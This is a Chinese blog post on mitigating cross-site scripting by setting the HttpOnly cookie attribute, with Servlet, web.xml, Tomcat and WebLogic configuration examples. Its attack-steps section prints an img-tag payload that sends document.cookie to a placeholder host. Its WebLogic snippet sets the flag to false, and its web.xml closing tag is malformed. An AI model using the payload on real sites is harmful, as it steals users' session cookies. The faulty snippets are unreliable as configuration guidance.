漏洞解决方案-跨站脚本攻击之HttpOnly设置

最新推荐文章于 2023-12-21 16:39:34 发布
最新推荐文章于 2023-12-21 16:39:34 发布
阅读量4.6k 收藏
点赞数 3
分类专栏: 安全 文章标签: 安全漏洞 web开发
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_35488871/article/details/108233004
版权

漏洞解决方案-跨站脚本攻击之HttpOnly设置

漏洞概述

在Web安全领域,跨站脚本攻击时最为常见的一种攻击形式,也是长久以来的一个老大难问题,HTTP-only cookie是一种用以缓解跨站脚本攻击的技术,如果您在cookie中设置了HttpOnly属性,那么通过js脚本将无法读取到cookie信息,这样能有效的防止XSS盗取用户cookie。

攻击步骤

  1. 测试并发现一个存在XSS漏洞网站。
  2. 通过XSS漏洞,插入恶意链接:
    <img src=‘http://xxxx/cookie.php?cookie='+encodeURIComponent(document.cookie)>
  3. 当其他用户访问相关页面时,恶意插入的代码被执行,用户的cookie信息被发送到恶意链接地址。

设置方法

  1. Servlet2.5及以下版本,不支持httpOnly,可通过response.addHeader或response.setHeader设置httponly。
    (1)response.addHeader

    //设置cookie
response.addHeader("Set-Cookie", "uid=112; Path=/; HttpOnly");
//设置多个cookie
response.addHeader("Set-Cookie", "uid=112; Path=/; HttpOnly");
response.addHeader("Set-Cookie", "timeout=30; Path=/test; HttpOnly");
//设置https的cookie
response.addHeader("Set-Cookie", "uid=112; Path=/; Secure; HttpOnly");

    (2)response.setHeader

    response.setHeader("Set-Cookie","cookiename=value;Path=/;Domain=domainvalue;Max-Age=seconds;HTTPOnly");

  2. Servlet3.0提供SessionCookieConfig接口,用于操作会话Cookie,其中有setHttpOnly(boolean httpOnly) 设置是否支持HttpOnly属性。

    cookie.setHttpOnly(true);

  3. 也可以在web.xml配置如下:

    <session-config>
	<cookie-config>
		<http-only>true</http-only>
	</cookie-config>
<session-config>

  4. 对于tomcat6支持对JSESSIONID的cookie设置HttpOnly,
    具体的设置是在context.xml配置文件中进行设置的,为Context标签添加如下属性即可开启或禁止HttpOnly:

    <Context useHttpOnly="true"/>

  5. 对于weblogic,可以在weblogic.xml里添加

    <session-descriptor>
	<cookie-http-only>false</cookie-http-only>
</session-descriptor>

关注公众号,一起分享实用安全技术,关注安全最新事件,记录工作常见问题,吐槽生活真心操蛋。
在这里插入图片描述

rel~smart
关注
专栏目录
Set-Cookie: JSESSIONID=8AB51DC4244907FD9EBB063C7FD73CBA; Path=/; HttpOnly
11-20
Set-Cookie: JSESSIONID=8AB51DC4244907FD9EBB063C7FD73CBA; Path=/; HttpOnly 解决此类cookie暴露项目路径问题
漏洞解决方案-HttpOnly设置
smart的博客
08-11 7601
漏洞解决方案-HttpOnly设置漏洞解决方案-HttpOnly设置漏洞概述攻击步骤设置方法 漏洞解决方案-HttpOnly设置 漏洞概述 在Web安全领域,跨站脚本攻击时最为常见的一种攻击形式,也是长久以来的一个老大难问题,HTTP-only cookie是一种用以缓解跨站脚本攻击的技术,如果您在cookie中设置HttpOnly属性,那么通过js脚本将无法读取到cookie信息,这样能有效的防止XSS盗取用户cookie。 攻击步骤 测试并发现一个存在XSS漏洞网站。 通过XSS漏洞,插入恶意链接:
response如何添加httpOnly级别的cookie
fsp88927的专栏
04-23 3749
httpOnly:Cookie cookie = new Cookie(name, value);cookie.setMaxAge(maxAge);cookie.setPath(path);cookie.setDomain(domain);cookie.setSecure(secure);response.addCookie(cookie);httpOnly:(把cookie拼接为字符串,然后写...
用ISAPI Filter设置HttpOnly属性
weixin_34377065的博客
10-07 151
作者:Tony Qu 说到ISAPI很多人会觉得很陌生,因为如果你是做ASP.NET开发的话,ISAPI的方式已经过时,取而代之的是HttpHandler和HttpModule,说到这两个东西很多人估计明白了,ISAPI可以说是早期实现请求拦截和处理的唯一途径,只是随着ASP.NET的流行,渐渐淡出了开发人员的视野。 此文的开发场景是这样的,我们公司使用古老的ASP...
利用Kangle的HTTP-only,Cookie防XSS跨站攻击
扯扯扯丶扯疍的博客
06-14 4181
在kangle中我们可以通过访问控制,对cookie增加这一属性,而不用修改程序,非常方便。 进入kangle(2.9.6以上版本)的管理后台(http://localhost:3311/),点左边的"回应控制",再到BEGIN表中增加一条规则。在标记模块中选http_only。Cookie中选择要增加HTTP-Only属性的cookie值(支持正则),我们输入.匹配全部。如图: 点提交即可,是不是非常方便呢! ...
XSS跨站脚本攻击漏洞修复方法
06-18
**XSS跨站脚本攻击漏洞修复方法** XSS(Cross-Site Scripting)跨站脚本攻击是一种常见的网络安全威胁,它允许攻击者在用户的浏览器上执行恶意代码,从而窃取用户敏感信息、操纵用户行为或者对网站进行破坏。本文将...
XSS跨站脚本攻击在Java开发中防范的方法
01-09
XSS(Cross-Site Scripting)跨站脚本攻击是一种常见的安全威胁,它利用Web应用程序的安全漏洞,将恶意脚本注入到合法的网页中,进而攻击最终用户。XSS攻击主要分为以下两种类型: 1. **存储型XSS**(Persistent ...
java 过滤跨站攻击_存储XSS跨站脚本攻击过滤解决方案
weixin_29625619的博客
02-16 990
漏洞描述:本页面存在跨站脚本攻击。跨站脚本漏洞,即XSS,通常用Javascript语言描述,它允许攻击者发送恶意代码给另一个用户。因为浏览器无法识别脚本是否可信,跨站漏洞脚本便运行并让攻击者获取其他用户的cookie或session。加固建议:总体修复方式:验证所有输入数据,有效检测攻击;对所有输出数据进行适当的编码,以防止任何已成功注入的脚本在浏览器端运行。具体如下 :输入验证:某个数据被接受...
ASP源码—修补跨站脚本攻击漏洞.zip
11-03
这个"ASP源码—修补跨站脚本攻击漏洞.zip"压缩包文件显然是针对ASP应用的安全性,特别是修复跨站脚本(Cross-Site Scripting, XSS)攻击的解决方案跨站脚本攻击是网络安全领域中常见的一种攻击方式,它发生在...
WEB漏洞篇——跨站脚本攻击(XSS)
m0_56634355的博客
06-05 4762
目录一、XSS简述1.1 什么是XSS1.2 XSS分类1.3 DOM XSS漏洞演示二、XSS攻击进阶2.1 初探XSS Payload2.2 强大的XSS Payload2.3 XSS攻击平台2.4 XSS Worm2.5 XSS构造技巧2.6 反射型XSS利用技巧-回旋镖2.7 Flash XSS2.8 JavaScript开放框架三、XSS防御3.1 HttpOnly3.2 输入检查3.3 输出检查3.4 正确地防御XSS3.5 处理富文本3.6 防御DOM Based XSS四、总结XSS攻击是指
反射型XSS跨站脚本攻击和防御
认知 行动 坚持
07-05 6247
在前面的文章中,讲述了最好懂的存储型XSS攻击和防御,本文来聊聊反射型XSS,所谓反射,就像镜子一样,一束光发过去,立即弹回来。这里依赖于微博服务器存在反射XSS漏洞。那么,坏人C为什么不自己搭建一个反射服务器进行反射呢? 这是个好问题。以js获取cookie为例,如果坏人C自己搭建反射服务器,那么很显然document.cookie就无法获取好人A的微博cookie,所以,还是要用微博服务器做反射,这样才能获取好人A的微博cookie,从而进行攻击。
springboot实现cookie的HttpOnly设置
qq_33164327的博客
12-04 1641
Cookie设置HttpOnly属性
HttpOnly
翻过这座山,就到菩提洞了
03-27 762
1.什么是HttpOnly?   如果您在cookie中设置HttpOnly属性,那么通过js脚本将无法读取到cookie信息,这样能有效的防止XSS攻击 具体一点的介绍请google进行搜索 2.javaEE的API是否支持?   目前sun公司还没有公布相关的API,但PHP、C#均有实现。搞javaEE的兄弟们比较郁闷了,别急下文有变通实现   3.HttpOnly设置样例 ...
谷歌浏览器HttpOnly跨域请求
weixin_42537012的博客
12-03 922
谷歌浏览器HttpOnly跨域请求
跨站脚本攻击利用HTTP控件发送COOKIE
04-03 1125
跨站脚本攻击想必各位都已经是很熟悉了,但是得到COOKIE的时候一直有一个问题: 总是要用WINDOW.OPEN弹一个窗体出来然后发送COOKIE,这样隐秘性就大打折扣了。以前我想了一个在网页中用insertAdjacentHTML方法来注入HTML语句的办法勉强可以作到发送COOKIE不出现IE窗口,但是在实际使用中有时会遇到IE出错。 没有更好的办法了吗?以前在研究VBS病毒自动升级的时候用到
cookie的httpOnly设置与使用问题
最新发布
bingmoujs的博客
12-21 3458
设置一个 HttpOnly 的 cookie 意味着该 cookie 不能通过客户端脚本(如 JavaScript)进行访问。这是一个安全措施,通常用于减少某些类型的攻击,如跨站脚本攻击 (XSS)。以下是如何在不同的上下文中设置 HttpOnly cookie:1. 在 HTTP 响应中:如果你正在使用纯 HTTP/HTTPS(没有特定的后端语言或框架),你可以在 HTTP 响应的 Set-Cookie 头中设置 HttpOnly 属性:HttpOnly;
[xss-3]httponly绕过
qq_41889600的博客
11-23 3022
小迪安全 xss httponly绕过
Cookie中的HttpOnly属性和XSS攻击
AGreatLoser
06-27 6622
httpOnly是一个常见的 Cookie 属性,用于增加对于跨站点脚本攻击(XSS)的防护。将 Cookie 的httpOnly属性设置为true会限制浏览器端 JavaScript 对该 Cookie 的访问,只允许在 HTTP 请求中自动发送 Cookie,而禁止通过 JavaScript 来读取或修改该 Cookie。使用httpOnly属性的目的是保护敏感的用户会话数据,例如用户身份验证令牌(如登录凭证、会话 ID 等)。
addheader()java_如何利用response.addHeader()方法设置cookie
weixin_39905695的博客
03-03 1509
将cookie设置HttpOnly是为了防止XSS攻击,窃取cookie内容,这样就增加了cookie的安全性,即便是这样,也不要将重要信息存入cookie。如何在Java中设置cookie是HttpOnly呢?Servlet 2.5 API 不支持 cookie设置HttpOnlyhttp://docs.oracle.com/cd/E17802_01/products/products/ser...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值